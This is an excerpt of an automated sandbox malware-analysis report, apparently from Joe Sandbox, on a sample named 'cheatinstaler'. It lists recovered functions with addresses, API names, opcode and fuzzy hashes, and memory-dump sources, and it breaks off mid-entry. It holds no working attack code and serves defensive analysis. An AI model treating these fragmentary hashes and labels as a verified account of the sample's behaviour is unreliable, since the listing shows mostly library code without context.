                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressProc
                                                                                                  • String ID:
                                                                                                  • API String ID: 190572456-0
                                                                                                  • Opcode ID: d8da239e760e4119be076ce5ae60c5d71a4e7276355522d8061e2664917ecd9d
                                                                                                  • Instruction ID: 9fae4d2e6e73e62ca95d342f8683911b4ea53ff9ce1c7066759552d39669aa73
                                                                                                  • Opcode Fuzzy Hash: d8da239e760e4119be076ce5ae60c5d71a4e7276355522d8061e2664917ecd9d
                                                                                                  • Instruction Fuzzy Hash: 9541E562B0AA4282FB158F13AC046756395BF68BD1F0946B5DDEDCB784EE3CE6409380
                                                                                                  Function 00007FF6C16F56D8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _set_statfp
                                                                                                  • String ID:
                                                                                                  • API String ID: 1156100317-0
                                                                                                  • Opcode ID: f3bd3298a46f29c998dca386ec4adc9bd6d7efdfabb851da102e47160911a3a1
                                                                                                  • Instruction ID: 7712aff11f63a187887119a796ed80ad766ecd4d4c68f9f009ce104aa869c238
                                                                                                  • Opcode Fuzzy Hash: f3bd3298a46f29c998dca386ec4adc9bd6d7efdfabb851da102e47160911a3a1
                                                                                                  • Instruction Fuzzy Hash: DE11C136E5CB07C1F7548D2BE5463790941AF463A2F488230EAFE8A6D6CF2CAC40A205
                                                                                                  Function 00007FF6C16DFE24 Relevance: 7.5, APIs: 5, Instructions: 29windowsynchronizationCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Message$DispatchObjectPeekSingleTranslateWait
                                                                                                  • String ID:
                                                                                                  • API String ID: 3621893840-0
                                                                                                  • Opcode ID: eb57a341668d454e4e6cd52f39bb1811463ddcab187ea95c48cb89abc8d18535
                                                                                                  • Instruction ID: 4f349eaf067247f04ac74b0d11ddcd47729a72b777bb48a7cc8dddbfe7e898c8
                                                                                                  • Opcode Fuzzy Hash: eb57a341668d454e4e6cd52f39bb1811463ddcab187ea95c48cb89abc8d18535
                                                                                                  • Instruction Fuzzy Hash: C0F06221F3844692F7109F22E468B766211FFE4B06F641070E9CEC1995DE2CD149D710
                                                                                                  Function 00007FF6C16E625C Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: __except_validate_context_recordabort
                                                                                                  • String ID: csm$csm
                                                                                                  • API String ID: 746414643-3733052814
                                                                                                  • Opcode ID: 91fc108a1c492767e4bb41002f60c2920875b1ec76e01922ab372504797a4c8e
                                                                                                  • Instruction ID: 5e8e6bf452e95f580aa9f24e3f171baa8166b7d0fc8950b8664b270b2a6a46af
                                                                                                  • Opcode Fuzzy Hash: 91fc108a1c492767e4bb41002f60c2920875b1ec76e01922ab372504797a4c8e
                                                                                                  • Instruction Fuzzy Hash: D571C372509681CAD7608F26D85077D7BA1EF01B9AF048235DACD87B85CF3CDA96D780
                                                                                                  Function 00007FF6C16E80F4 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                  • String ID: $*
                                                                                                  • API String ID: 3215553584-3982473090
                                                                                                  • Opcode ID: 42643a1ee39b50d27a50b926b179a62c0cdc4d381fe14b17104e750277292b9f
                                                                                                  • Instruction ID: 81268014ddb24214cb1e7cb2ba4a109d038e9dde3bc131a2ec0a61c92c9c3eb8
                                                                                                  • Opcode Fuzzy Hash: 42643a1ee39b50d27a50b926b179a62c0cdc4d381fe14b17104e750277292b9f
                                                                                                  • Instruction Fuzzy Hash: 5E51757290CA428EE7648E2A884437C37A8FF15B0AF145335C6CA813D9DF2CD6A1E6C5
                                                                                                  Function 00007FF6C16F1758 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 126COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharMultiWide$StringType
                                                                                                  • String ID: $%s
                                                                                                  • API String ID: 3586891840-3791308623
                                                                                                  • Opcode ID: 8174e861c2faa6f2f7f5292a0ee7474812abc1109b8acb2517e9a7bc716d8d39
                                                                                                  • Instruction ID: 603cec34b3125a95633df062e8fbcbb242d574e4db1bb0bf19665eda589ecb16
                                                                                                  • Opcode Fuzzy Hash: 8174e861c2faa6f2f7f5292a0ee7474812abc1109b8acb2517e9a7bc716d8d39
                                                                                                  • Instruction Fuzzy Hash: 6E419E22B15B818AEB218F27D9003A922A5FF46BE9F494235DEED877C5DF3CE5419340
                                                                                                  Function 00007FF6C16E66A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 117COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateFrameInfo__except_validate_context_recordabort
                                                                                                  • String ID: csm
                                                                                                  • API String ID: 2466640111-1018135373
                                                                                                  • Opcode ID: ef48871438151390fa300b301edbe87f2aaf35895cd4fd9de5e2d21b12dcaab2
                                                                                                  • Instruction ID: d1f487429f8ed418e12546c92ac6f906f30327b2143cee5c91969d1fc0ae32db
                                                                                                  • Opcode Fuzzy Hash: ef48871438151390fa300b301edbe87f2aaf35895cd4fd9de5e2d21b12dcaab2
                                                                                                  • Instruction Fuzzy Hash: 6F518E7662874287DB20AF26E94026E77A4FB88B91F040234EBCD87B55CF38E551DB80
                                                                                                  Function 00007FF6C16F4360 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100fileCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharErrorFileLastMultiWideWrite
                                                                                                  • String ID: U
                                                                                                  • API String ID: 2456169464-4171548499
                                                                                                  • Opcode ID: a3c4996b5397ae7c68c43f4944c85cd830f0b958292ccb38960a62bfe152ddee
                                                                                                  • Instruction ID: 550ab45bf1337d40257c3c495ba42e798a9d0935f1360e1cb9ab0d91b26adc2e
                                                                                                  • Opcode Fuzzy Hash: a3c4996b5397ae7c68c43f4944c85cd830f0b958292ccb38960a62bfe152ddee
                                                                                                  • Instruction Fuzzy Hash: C341AE22B19A8182EB208F26E8443AA67A1FB88795F844131EECDC7B88DF7CD451D744
                                                                                                  Function 00007FF6C16D90B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ObjectRelease
                                                                                                  • String ID:
                                                                                                  • API String ID: 1429681911-3916222277
                                                                                                  • Opcode ID: 0b5772d91688d342ea342be5c9c3c9ea07a5ad9e93d570546deb1a9808731c40
                                                                                                  • Instruction ID: be82a17ebcb2445e40d69a0a2abe587a37ff7e6f2587f02b94f24cbce8c8134d
                                                                                                  • Opcode Fuzzy Hash: 0b5772d91688d342ea342be5c9c3c9ea07a5ad9e93d570546deb1a9808731c40
                                                                                                  • Instruction Fuzzy Hash: A1312D3561874286EB15DF13B82862AB7A1F789FD2F604435ED8E83B55CE3CE449CB10
                                                                                                  Function 00007FF6C16CE870 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • InitializeCriticalSection.KERNEL32(?,?,?,00007FF6C16D317F,?,?,00001000,00007FF6C16BE51D), ref: 00007FF6C16CE8BB
                                                                                                  • CreateSemaphoreW.KERNEL32(?,?,?,00007FF6C16D317F,?,?,00001000,00007FF6C16BE51D), ref: 00007FF6C16CE8CB
                                                                                                  • CreateEventW.KERNEL32(?,?,?,00007FF6C16D317F,?,?,00001000,00007FF6C16BE51D), ref: 00007FF6C16CE8E4
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                                  • String ID: Thread pool initialization failed.
                                                                                                  • API String ID: 3340455307-2182114853
                                                                                                  • Opcode ID: 6610cce2f1ff4f40d78c24fcbab0d777ace7136147ab701da82aad1b7a389e44
                                                                                                  • Instruction ID: c4c5a8dfbfb5114626faab7a79fe3e9e9d600c3cf82fbd8ae7fa546be9577978
                                                                                                  • Opcode Fuzzy Hash: 6610cce2f1ff4f40d78c24fcbab0d777ace7136147ab701da82aad1b7a389e44
                                                                                                  • Instruction Fuzzy Hash: 68213D32F1564286FB108F26D4547FD36A2FB94B0EF288034CACD8A295DF7E9455D780
                                                                                                  Function 00007FF6C16D85E0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 19COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CapsDeviceRelease
                                                                                                  • String ID:
                                                                                                  • API String ID: 127614599-3916222277
                                                                                                  • Opcode ID: a42f7bf34e2550c06df92b4c4441a28b155cc5d7cfc3f2a0da00e80f490195b4
                                                                                                  • Instruction ID: 23163b558febeafb6fecbd4f182068d7fe25da7fd142acbacf5ee956a30455a3
                                                                                                  • Opcode Fuzzy Hash: a42f7bf34e2550c06df92b4c4441a28b155cc5d7cfc3f2a0da00e80f490195b4
                                                                                                  • Instruction Fuzzy Hash: 79E0C220B0CA4186FB085BB7B5A903E6261AB4CBD1F258035DA5F83795CE3CC4C44310
                                                                                                  Function 00007FF6C16BD1A8 Relevance: 6.2, APIs: 4, Instructions: 238timeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$FileTime
                                                                                                  • String ID:
                                                                                                  • API String ID: 1137671866-0
                                                                                                  • Opcode ID: 6a66750d7d38e285348c6a4672a5517d432b12a502a6a2b91e6f62eece89d76d
                                                                                                  • Instruction ID: 6831ce9ed5502fe12f1c0358791c209b82fdd1e1ca072f804e81f68e07ad8473
                                                                                                  • Opcode Fuzzy Hash: 6a66750d7d38e285348c6a4672a5517d432b12a502a6a2b91e6f62eece89d76d
                                                                                                  • Instruction Fuzzy Hash: CDA1B262A18B8281EB10DF66E8502ED6371FF85799F405131EADD87AE9DF3CE544E700
                                                                                                  Function 00007FF6C16D0548 Relevance: 6.1, APIs: 4, Instructions: 122COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast
                                                                                                  • String ID:
                                                                                                  • API String ID: 1452528299-0
                                                                                                  • Opcode ID: a1a85338bd98e6dbbf4cbb69018a0b2acca20fb05f372e3efc38fb1d82780d4d
                                                                                                  • Instruction ID: f81e5b21798c1051cd6aeee541b91974bfa5126928140ccc53aece151693b761
                                                                                                  • Opcode Fuzzy Hash: a1a85338bd98e6dbbf4cbb69018a0b2acca20fb05f372e3efc38fb1d82780d4d
                                                                                                  • Instruction Fuzzy Hash: B451B262B14A4695FB00AF7AD4542FC2321EF85BD9F504235EADC977D6EE2CD640E340
                                                                                                  Function 00007FF6C16D9D90 Relevance: 6.1, APIs: 4, Instructions: 106COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateCurrentDirectoryErrorFreeLastLocalProcess
                                                                                                  • String ID:
                                                                                                  • API String ID: 1077098981-0
                                                                                                  • Opcode ID: 91dec681af915968dd102d853b3eeeabd4842e789cbe2ad92d88e952f467e522
                                                                                                  • Instruction ID: c1efd8766e994ed311c2ea6673c262dca0cfff8fffdab0e826236b45dddbb270
                                                                                                  • Opcode Fuzzy Hash: 91dec681af915968dd102d853b3eeeabd4842e789cbe2ad92d88e952f467e522
                                                                                                  • Instruction Fuzzy Hash: 81517032A18B8286EB50DF22E4447AE7364FB85B85F601135EACE97B54DF3CD504CB40
                                                                                                  Function 00007FF6C16EDB5C Relevance: 6.1, APIs: 4, Instructions: 104COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                                                                                                  • String ID:
                                                                                                  • API String ID: 4141327611-0
                                                                                                  • Opcode ID: fdb879c7c344a6dcddabd48f24568e2f5e84c2dc3f6ceef9c32cec135b3ccbbf
                                                                                                  • Instruction ID: 2647fa5e31b2153e306b7c4eb16dae530f785fc41f7981f498233996392f40e3
                                                                                                  • Opcode Fuzzy Hash: fdb879c7c344a6dcddabd48f24568e2f5e84c2dc3f6ceef9c32cec135b3ccbbf
                                                                                                  • Instruction Fuzzy Hash: 9041D472A0C64246FB618F12D840379A294EF90FD2F148231DACD87AC5DF7CDA51A780
                                                                                                  Function 00007FF6C16C3980 Relevance: 6.1, APIs: 4, Instructions: 101fileCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FileMove_invalid_parameter_noinfo_noreturn
                                                                                                  • String ID:
                                                                                                  • API String ID: 3823481717-0
                                                                                                  • Opcode ID: 47dbf0decc8272d9a7ae459b130201949f9107b8ec80fb87a20ec63cf3da1f82
